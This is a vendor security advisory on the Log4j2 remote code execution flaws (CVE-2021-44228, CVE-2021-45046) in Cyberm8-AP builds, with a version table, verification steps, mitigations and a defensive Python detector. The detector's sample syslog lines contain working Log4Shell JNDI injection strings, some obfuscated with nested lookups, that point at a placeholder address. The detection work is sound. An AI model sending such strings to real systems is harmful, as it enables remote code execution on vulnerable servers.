Apache Log4j2 Remote Code Execution vulnerability CVE-2021-44228, CVE-2021-45046


Security Advisory Description

Apache Log4j is a Java-based logging utility and is part of the Apache Logging Services project of the Apache Software Foundation. On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified as being exploited in the wild (CVE-2021-44228). By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker can instruct that system to download and subsequently execute a malicious payload.

Update:
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DoS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
(Source: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046)

Impact on Cyberm8-AP

Our research team has verified that the following Cyberm8-AP versions include a vulnerable version of Log4j:

Cyberm8-AP Version                     | Vulnerability                                | Severity | Recommendation
Versions earlier than 3.0.0 Build 570  | Not Vulnerable                               | N/A      |
v3.0.0 Build 570 to v3.0.0 Build 577   | Vulnerable to CVE-2021-44228, CVE-2021-45046 | Critical | Follow “Recommended Actions”
v3.0.0 Build 581                       | Vulnerable to CVE-2021-45046                 | Low      | Follow “Recommended Actions”
v3.0.0 Build 605                       | Not Vulnerable                               | N/A      |

* Though versions v3.0.0 Build 570 to Build 581 are vulnerable, exploiting the vulnerability requires a specific non-default configuration to exist on the device, and the attacker must be an authenticated user or an approved source of Syslog/Mail notifications.
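Because the attacker-controlled input in this scenario arrives through syslog/mail notifications and must carry a JNDI Lookup pattern (see the update above), a defender can screen inbound notification data for such patterns before it reaches a logging appliance. The following Python is an added example, not part of this advisory or of Cyberm8-AP: it resolves the nested Log4j lookups commonly used to disguise the pattern (lower, upper, and :-default) and flags any line that then contains a JNDI lookup. The syslog lines are constructed, and 203.0.113.7 is a documentation address.

```python
import re

# Constructed sample syslog lines (not taken from the advisory). The last
# three carry JNDI lookup strings; two of them use nested-lookup obfuscation.
SAMPLE_SYSLOG = [
    "<134>Dec 10 10:01:02 fw01 kernel: eth0 link up",
    "<134>Dec 10 10:01:05 fw01 sshd[812]: Accepted publickey for ops from 10.0.0.5",
    "<134>Dec 10 10:02:11 fw01 app: user=${jndi:ldap://203.0.113.7:1389/a} login",
    "<134>Dec 10 10:02:12 fw01 app: user=${${lower:j}${upper:n}di:rmi://203.0.113.7/x}",
    "<134>Dec 10 10:02:13 fw01 app: user=${${::-j}${::-n}di:dns://203.0.113.7/y}",
]

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([A-Za-z]+)\s*:", re.IGNORECASE)


def _resolve(token: str) -> str:
    """Resolve one lookup body the way Log4j 2 would, for the lookups that are
    routinely nested to hide the word 'jndi'. Anything else is left untouched."""
    name, sep, arg = token.partition(":")
    if sep and name.lower() == "lower":
        return arg.lower()
    if sep and name.lower() == "upper":
        return arg.upper()
    if ":-" in token:                      # ${prefix:key:-default} -> default
        return token.split(":-", 1)[1]
    return "${" + token + "}"              # unknown lookup: keep as-is


def normalize(line: str) -> str:
    """Repeatedly resolve innermost lookups until the text stops changing."""
    for _ in range(20):                    # bound the work on hostile input
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), line)
        if resolved == line:
            return line
        line = resolved
    return line


def find_jndi_lookups(lines):
    """Return (original_line, scheme) for every line containing a JNDI lookup."""
    hits = []
    for line in lines:
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((line, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for raw, scheme in find_jndi_lookups(SAMPLE_SYSLOG):
        print(f"JNDI lookup ({scheme}) in: {raw}")
```

Run over the constructed sample, the three tainted lines are reported with schemes ldap, rmi and dns while the two benign lines pass.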

How to Verify

Using the WebUI:
1. Log in to the Cyberm8-AP WebUI as an administrator.
2. Verify the version and build number on the bottom of the left (main) menu.

Using the Shell:
1. Log in to the Cyberm8-AP shell.
2. Run the command ‘csh version’ to verify the version and build numbers.

Recommended Actions

  1. Upgrade Cyberm8-AP to the latest non-vulnerable version (3.0.0 Build 605).
  2. Maintain an updated access list on your network firewalls of the sources authorized to send syslog/mail triggers to Cyberm8-AP.
  3. Maintain an updated access list of allowed outbound communication from Cyberm8-AP to desired targets on your network firewalls.
  4. Prevent unauthorized network access to Cyberm8-AP management interface.